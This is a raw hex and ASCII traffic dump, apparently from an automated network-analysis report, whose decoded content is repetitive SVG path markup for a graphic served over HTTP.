                                                                                                                                                                                                                                                        Data Ascii: 1-4.23-1.19,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path cl
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5780INData Raw: 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 30 2e 31 32 2c 31 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e
                                                                                                                                                                                                                                                        Data Ascii: .62"></path><path class="cls-7" d="M110.12,162a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5796INData Raw: 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 39 2e 30 37 2c 32 35 37 2e 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: cls-7" d="M149.07,257.39a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5812INData Raw: 2e 37 38 2c 31 30 37 2e 32 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c
                                                                                                                                                                                                                                                        Data Ascii: .78,107.24a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5828INData Raw: 37 32 2c 32 30 32 2e 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                        Data Ascii: 72,202.6a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5844INData Raw: 2c 32 39 38 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c
                                                                                                                                                                                                                                                        Data Ascii: ,298a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5860INData Raw: 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c
                                                                                                                                                                                                                                                        Data Ascii: 0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5876INData Raw: 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22
                                                                                                                                                                                                                                                        Data Ascii: 1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5892INData Raw: 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                        Data Ascii: 19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5908INData Raw: 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c
                                                                                                                                                                                                                                                        Data Ascii: -4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path cl
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5924INData Raw: 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 32 2c 33 34 37 2e 32 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M312,347.21a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5940INData Raw: 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 0,1-.91,2.61,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.46,2.46,0,0,1,.18,3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5956INData Raw: 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                        Data Ascii: 2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M367,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9"
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5972INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 35 32 2c 33 35 32 2e 32 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c
                                                                                                                                                                                                                                                        Data Ascii: s-9" d="M402.52,352.23a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5988INData Raw: 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 32 2c 31 39 37 2e 39 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32
                                                                                                                                                                                                                                                        Data Ascii: ,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M422,197.93a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6004INData Raw: 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                        Data Ascii: -.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8,2.8,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1,.18,3.32"></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6020INData Raw: 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 37 39 2c 33 34 39 2e 31 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                        Data Ascii: th class="cls-9" d="M492.79,349.18a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6036INData Raw: 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 32 32 2c 31 39 34 2e 38 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 41 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e
